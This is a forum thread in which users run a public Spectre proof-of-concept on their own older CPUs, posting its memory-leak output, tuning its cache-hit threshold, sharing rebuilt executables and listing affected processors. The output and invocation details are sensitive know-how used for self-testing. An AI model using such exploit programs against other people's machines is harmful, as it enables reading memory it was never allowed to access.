Sampei.Nihira Posted January 27, 2018 Author Share Posted January 27, 2018 25 minutes ago, Yellow Horror said: Seems that it can't read "the secret string" on my Pentium 4: L:\>spectre.exe Using a cache hit threshold of 80. Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED Reading 40 bytes: Reading at malicious_x = 00001024... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001025... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001026... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001027... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001028... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001029... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000102a... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000102b... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000102c... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000102d... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000102e... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000102f... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001030... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001031... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001032... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001033... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001034... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001035... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001036... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001037... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001038... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001039... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000103a... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000103b... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000103c... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000103d... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000103e... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000103f... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001040... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001041... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001042... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001043... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001044... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001045... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001046... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001047... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001048... Success: 0xFF=’?’ score=0 Reading at malicious_x = 00001049... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000104a... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0000104b... Success: 0xFF=’?’ score=0 Vulnerable. Link to comment Share on other sites More sharing options...
Sampei.Nihira Posted January 27, 2018 Author Share Posted January 27, 2018 My PC W.10 1709 x64 + Microsoft Patch Intel Dual Core E6700 Vulnerable. Link to comment Share on other sites More sharing options...
UCyborg Posted January 27, 2018 Share Posted January 27, 2018 (edited) Something's fishy here, check the example output from the project's GitHub page. Don't forget you can also specify cache hit threshold. Edited January 27, 2018 by UCyborg Link to comment Share on other sites More sharing options...
rloew Posted January 27, 2018 Share Posted January 27, 2018 It doesn't work. I got the same result when I tried to compile the original code myself. Link to comment Share on other sites More sharing options...
UCyborg Posted January 27, 2018 Share Posted January 27, 2018 Here are the updated executables, there are both SSE and SSE2 versions and the issue with garbled text has been fixed by using more widely supported ' character instead of ’. https://drive.google.com/open?id=1WG-62M9ZZwDXNf0xlhx6NhR-_gtDv7AC Link to comment Share on other sites More sharing options...
UCyborg Posted January 27, 2018 Share Posted January 27, 2018 I got the expected output with SSE2 version by invoking it like this: spectre-sse2.exe 100 I'm no expert, but isn't this supposed to be the kind of vulnerability that is difficult to exploit? Might take a clever hacker to put this to use in practice. Link to comment Share on other sites More sharing options...
dencorso Posted January 27, 2018 Share Posted January 27, 2018 Thankfully its unreliable (and requires access to the machine) 'cause most of us won't get any fix. Here I have an i7 3770K / Z68 (2nd gen and vunerable) on XP SP3 fully up-to-date. The SSE2 works OK the SSE version fails. The output is below in the spoiler: S:\>spectre-sse2 40 Using a cache hit threshold of 40. Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED Reading 40 bytes: Reading at malicious_x = 00001024... Success: 0x54='T' score=2 Reading at malicious_x = 00001025... Success: 0x68='h' score=2 Reading at malicious_x = 00001026... Success: 0x65='e' score=2 Reading at malicious_x = 00001027... Success: 0x20=' ' score=2 Reading at malicious_x = 00001028... Success: 0x4D='M' score=2 Reading at malicious_x = 00001029... Success: 0x61='a' score=2 Reading at malicious_x = 0000102a... Success: 0x67='g' score=2 Reading at malicious_x = 0000102b... Success: 0x69='i' score=2 Reading at malicious_x = 0000102c... Success: 0x63='c' score=2 Reading at malicious_x = 0000102d... Success: 0x20=' ' score=2 Reading at malicious_x = 0000102e... Success: 0x57='W' score=2 Reading at malicious_x = 0000102f... Success: 0x6F='o' score=2 Reading at malicious_x = 00001030... Success: 0x72='r' score=2 Reading at malicious_x = 00001031... Success: 0x64='d' score=2 Reading at malicious_x = 00001032... Success: 0x73='s' score=2 Reading at malicious_x = 00001033... Success: 0x20=' ' score=2 Reading at malicious_x = 00001034... Success: 0x61='a' score=2 Reading at malicious_x = 00001035... Success: 0x72='r' score=2 Reading at malicious_x = 00001036... Success: 0x65='e' score=2 Reading at malicious_x = 00001037... Success: 0x20=' ' score=2 Reading at malicious_x = 00001038... Success: 0x53='S' score=2 Reading at malicious_x = 00001039... Success: 0x71='q' score=2 Reading at malicious_x = 0000103a... Success: 0x75='u' score=2 Reading at malicious_x = 0000103b... Success: 0x65='e' score=2 Reading at malicious_x = 0000103c... Success: 0x61='a' score=2 Reading at malicious_x = 0000103d... Success: 0x6D='m' score=2 Reading at malicious_x = 0000103e... Success: 0x69='i' score=2 Reading at malicious_x = 0000103f... Success: 0x73='s' score=2 Reading at malicious_x = 00001040... Success: 0x68='h' score=2 Reading at malicious_x = 00001041... Success: 0x20=' ' score=2 Reading at malicious_x = 00001042... Success: 0x4F='O' score=2 Reading at malicious_x = 00001043... Success: 0x73='s' score=2 Reading at malicious_x = 00001044... Success: 0x73='s' score=2 Reading at malicious_x = 00001045... Success: 0x69='i' score=2 Reading at malicious_x = 00001046... Success: 0x66='f' score=2 Reading at malicious_x = 00001047... Success: 0x72='r' score=2 Reading at malicious_x = 00001048... Success: 0x61='a' score=2 Reading at malicious_x = 00001049... Success: 0x67='g' score=2 Reading at malicious_x = 0000104a... Success: 0x65='e' score=2 Reading at malicious_x = 0000104b... Success: 0x2E='.' score=2 S:\>spectre-sse 40 Using a cache hit threshold of 40. Build: RDTSCP_NOT_SUPPORTED MFENCE_NOT_SUPPORTED CLFLUSH_NOT_SUPPORTED Reading 40 bytes: Reading at malicious_x = 00001024... Unclear: 0x11='?' score=921 (second best: 0xCF='?' score=920) Reading at malicious_x = 00001025... Unclear: 0x67='g' score=925 (second best: 0xEF='?' score=924) Reading at malicious_x = 00001026... Unclear: 0x16='?' score=932 (second best: 0x64='d' score=918) Reading at malicious_x = 00001027... Unclear: 0x67='g' score=923 (second best: 0x5F='_' score=918) Reading at malicious_x = 00001028... Unclear: 0x67='g' score=917 (second best: 0x23='#' score=917) Reading at malicious_x = 00001029... Unclear: 0x67='g' score=924 (second best: 0x21='!' score=921) Reading at malicious_x = 0000102a... Unclear: 0x16='?' score=917 (second best: 0x39='9' score=915) Reading at malicious_x = 0000102b... Unclear: 0x16='?' score=932 (second best: 0x11='?' score=928) Reading at malicious_x = 0000102c... Unclear: 0x67='g' score=929 (second best: 0x64='d' score=926) Reading at malicious_x = 0000102d... Unclear: 0xCF='?' score=934 (second best: 0x12='?' score=929) Reading at malicious_x = 0000102e... Unclear: 0x91='?' score=918 (second best: 0x21='!' score=918) Reading at malicious_x = 0000102f... Unclear: 0x16='?' score=916 (second best: 0xB8='?' score=914) Reading at malicious_x = 00001030... Unclear: 0x67='g' score=922 (second best: 0x64='d' score=919) Reading at malicious_x = 00001031... Unclear: 0x16='?' score=934 (second best: 0xCF='?' score=920) Reading at malicious_x = 00001032... Unclear: 0x11='?' score=924 (second best: 0xCF='?' score=920) Reading at malicious_x = 00001033... Unclear: 0x5F='_' score=926 (second best: 0x16='?' score=918) Reading at malicious_x = 00001034... Unclear: 0x67='g' score=924 (second best: 0x16='?' score=919) Reading at malicious_x = 00001035... Unclear: 0x7C='|' score=916 (second best: 0x11='?' score=913) Reading at malicious_x = 00001036... Unclear: 0x11='?' score=926 (second best: 0x7C='|' score=923) Reading at malicious_x = 00001037... Unclear: 0x11='?' score=924 (second best: 0x64='d' score=919) Reading at malicious_x = 00001038... Unclear: 0xC3='?' score=920 (second best: 0xB8='?' score=919) Reading at malicious_x = 00001039... Unclear: 0x5F='_' score=919 (second best: 0x11='?' score=918) Reading at malicious_x = 0000103a... Unclear: 0x11='?' score=928 (second best: 0x7C='|' score=926) Reading at malicious_x = 0000103b... Unclear: 0x16='?' score=924 (second best: 0x15='?' score=917) Reading at malicious_x = 0000103c... Unclear: 0x2B='+' score=918 (second best: 0x23='#' score=917) Reading at malicious_x = 0000103d... Unclear: 0x94='?' score=916 (second best: 0xED='?' score=914) Reading at malicious_x = 0000103e... Unclear: 0x67='g' score=938 (second best: 0x16='?' score=923) Reading at malicious_x = 0000103f... Unclear: 0x15='?' score=927 (second best: 0x67='g' score=925) Reading at malicious_x = 00001040... Unclear: 0x12='?' score=938 (second best: 0x11='?' score=937) Reading at malicious_x = 00001041... Unclear: 0x67='g' score=953 (second best: 0xEF='?' score=921) Reading at malicious_x = 00001042... Unclear: 0x67='g' score=936 (second best: 0x15='?' score=917) Reading at malicious_x = 00001043... Unclear: 0x23='#' score=921 (second best: 0xEF='?' score=918) Reading at malicious_x = 00001044... Unclear: 0x11='?' score=920 (second best: 0x22='"' score=910) Reading at malicious_x = 00001045... Unclear: 0x11='?' score=934 (second best: 0x23='#' score=931) Reading at malicious_x = 00001046... Unclear: 0x67='g' score=929 (second best: 0x91='?' score=914) Reading at malicious_x = 00001047... Unclear: 0xEF='?' score=917 (second best: 0x67='g' score=915) Reading at malicious_x = 00001048... Unclear: 0x16='?' score=929 (second best: 0x11='?' score=914) Reading at malicious_x = 00001049... Unclear: 0x5F='_' score=924 (second best: 0x23='#' score=920) Reading at malicious_x = 0000104a... Unclear: 0xAF='?' score=929 (second best: 0x16='?' score=925) Reading at malicious_x = 0000104b... Unclear: 0x67='g' score=935 (second best: 0x15='?' score=922) 1 Link to comment Share on other sites More sharing options...
Yellow Horror Posted January 27, 2018 Share Posted January 27, 2018 (edited) I try the exploit on a few hardware sets and figure out: The "SSE2" version works successfully on i3 CPU under XP and unpatched 7 (with threshold 32 or more). The "SSE" version starts but can't read "the secret string" anywhere, even in the vulnerable environment from previous point (i try some different thresholds from 40 to 1000). The "SSE2" version don't work on Pentium 4 (expected, because it don't support SSE2) and on Core 2 CPU that definitely supports SSE2. It exits with error before finishing the first "reading at..." message. MSE is angry about SSE2 version. Edited January 27, 2018 by Yellow Horror Link to comment Share on other sites More sharing options...
UCyborg Posted January 27, 2018 Share Posted January 27, 2018 (edited) I compiled 2 more versions (see link in one of my previous posts), one that has SSE2 but doesn't utilize RDTSCP instruction (not related to SSE2) and another without SSE2 but with RDTSCP (rather pointless, I was curious if it would output the magic string). Wondering if there's a CPU out there that would work with SSE version, or if there's something off in the code or maybe exploit simply doesn't work that way, who knows. The first set of extra instructions that predates SSE is MMX if I remember correctly. Isn't it supposed to work on CPUs without any such extensions? If so, we'd need a test that works on such CPUs. Supposedly there are certain x86 only CPUs that have SSE2, but not RDTSCP (the reason for the crash @Sampei.Nihira mentioned?). Edited January 27, 2018 by UCyborg Link to comment Share on other sites More sharing options...
Sampei.Nihira Posted January 27, 2018 Author Share Posted January 27, 2018 32 minutes ago, UCyborg said: I compiled 2 more versions (see link in one of my previous posts), one that has SSE2 but doesn't utilize RDTSCP instruction (not related to SSE2) and another without SSE2 but with RDTSCP (rather pointless, I was curious if it would output the magic string). Wondering if there's a CPU out there that would work with SSE version, or if there's something off in the code or maybe exploit simply doesn't work that way, who knows. The first set of extra instructions that predates SSE is MMX if I remember correctly. Isn't it supposed to work on CPUs without any such extensions? If so, we'd need a test that works on such CPUs. Supposedly there are certain x86 only CPUs that have SSE2, but not RDTSCP (the reason for the crash @Sampei.Nihira mentioned?). Run simultaneously in the same PC: The one below is unreliable. Pentium Dual Core E6700 W.10 1709 x64: Link to comment Share on other sites More sharing options...
Yellow Horror Posted January 27, 2018 Share Posted January 27, 2018 (edited) 51 minutes ago, UCyborg said: I compiled 2 more versions "SSE2 w/o RDTSCP" can't read "the secret string" on i3 with any threshold i try. "SSE2 w/o RDTSCP" on Core 2 give me some (very unstable) results (few letters of "secret sting" in their right positions, garbage in other positions) with default threshold. With any threshold i try to enter manually it give complete garbage. Both "SSE" versions don't read "the string" on i3. "SSE+RDTSCP" don't work on Core 2. For now it seems that Core 2 and older CPU's are invulnerable to this realization of exploit, but may be vulnerable to a better crafted one (due to partial success of "SSE2 w/o RDTSCP" version on Core 2). This is a bad news, i think. Edited January 27, 2018 by Yellow Horror Link to comment Share on other sites More sharing options...
UCyborg Posted January 27, 2018 Share Posted January 27, 2018 (edited) 27 minutes ago, Sampei.Nihira said: The one below is unreliable. You need to get a result like this: Using a cache hit threshold of 90. Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED Reading 40 bytes: Reading at malicious_x = 00001024... Success: 0x54='T' score=2 Reading at malicious_x = 00001025... Success: 0x68='h' score=2 Reading at malicious_x = 00001026... Success: 0x65='e' score=2 Reading at malicious_x = 00001027... Success: 0x20=' ' score=2 Reading at malicious_x = 00001028... Success: 0x4D='M' score=2 Reading at malicious_x = 00001029... Success: 0x61='a' score=2 Reading at malicious_x = 0000102a... Success: 0x67='g' score=2 Reading at malicious_x = 0000102b... Success: 0x69='i' score=2 Reading at malicious_x = 0000102c... Success: 0x63='c' score=2 Reading at malicious_x = 0000102d... Success: 0x20=' ' score=2 Reading at malicious_x = 0000102e... Success: 0x57='W' score=2 Reading at malicious_x = 0000102f... Success: 0x6F='o' score=2 Reading at malicious_x = 00001030... Success: 0x72='r' score=2 Reading at malicious_x = 00001031... Success: 0x64='d' score=2 Reading at malicious_x = 00001032... Success: 0x73='s' score=2 Reading at malicious_x = 00001033... Success: 0x20=' ' score=2 Reading at malicious_x = 00001034... Success: 0x61='a' score=2 Reading at malicious_x = 00001035... Success: 0x72='r' score=2 Reading at malicious_x = 00001036... Success: 0x65='e' score=2 Reading at malicious_x = 00001037... Success: 0x20=' ' score=2 Reading at malicious_x = 00001038... Success: 0x53='S' score=2 Reading at malicious_x = 00001039... Success: 0x71='q' score=2 Reading at malicious_x = 0000103a... Success: 0x75='u' score=2 Reading at malicious_x = 0000103b... Success: 0x65='e' score=2 Reading at malicious_x = 0000103c... Success: 0x61='a' score=2 Reading at malicious_x = 0000103d... Success: 0x6D='m' score=7 (second best: 0x2 9=')' score=1) Reading at malicious_x = 0000103e... Success: 0x69='i' score=2 Reading at malicious_x = 0000103f... Success: 0x73='s' score=2 Reading at malicious_x = 00001040... Success: 0x68='h' score=2 Reading at malicious_x = 00001041... Success: 0x20=' ' score=2 Reading at malicious_x = 00001042... Success: 0x4F='O' score=2 Reading at malicious_x = 00001043... Success: 0x73='s' score=2 Reading at malicious_x = 00001044... Success: 0x73='s' score=2 Reading at malicious_x = 00001045... Success: 0x69='i' score=2 Reading at malicious_x = 00001046... Success: 0x66='f' score=2 Reading at malicious_x = 00001047... Success: 0x72='r' score=2 Reading at malicious_x = 00001048... Success: 0x61='a' score=2 Reading at malicious_x = 00001049... Success: 0x67='g' score=2 Reading at malicious_x = 0000104a... Success: 0x65='e' score=2 Reading at malicious_x = 0000104b... Success: 0x2E='.' score=2 Read "The Magic Words are Squeamish Ossifrage." vertically. If you got something else, then it didn't work. You may also need to change cache hit threshold value by invoking the program like this: spectre-sse2.exe 90 Try some values between 40 - 300 for example. Edited January 27, 2018 by UCyborg Link to comment Share on other sites More sharing options...
Sampei.Nihira Posted January 28, 2018 Author Share Posted January 28, 2018 (edited) I can not make it this with the Pentium Dual Core E6700 The characters for each cache (20-400) value are always "?". Can I start both spectre-sse.exe and spectre-sse2.exe. ________________________________________________ In PC with XP (Pentium Celeron M380) it works without setting up cache. File Spectre-sse2.exe (and pause): Edited January 28, 2018 by Sampei.Nihira Link to comment Share on other sites More sharing options...
wyxchari Posted February 2, 2018 Share Posted February 2, 2018 (edited) 22 hours ago, Sampei.Nihira said: Intel Celeron M380 with FSB: Vulnerable to Spectre. Pentium Dual Core E6700 with FSB: Vulnerable to Spectre. You're right. According to this very reliable article, they are affected from the Pentium Pro (1995): https://disruptiveludens.wordpress.com/2018/01/05/meltdown-y-spectre/ Intel processors affected in all variants: Pentium Pro, Pentium II, Pentium III, Pentium 4, Pentium D, Pentium M, Core 2 Duo, Core 2 Quad, ... And continue with the expanded official list that Intel published: https://www.techarp.com/guides/complete-meltdown-spectre-cpu-list/ Not affected: Atom before 2013, Itanium. Edited February 2, 2018 by wyxchari Link to comment Share on other sites More sharing options...
Sampei.Nihira Posted February 2, 2018 Author Share Posted February 2, 2018 (edited) Correct. Pentium Pro is the first processor to use the Speculative Execution. Quote .........The Pentium Pro thus featured out of order execution, including speculative execution.............. . https://en.wikipedia.org/wiki/Pentium_Pro Edited February 2, 2018 by Sampei.Nihira Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now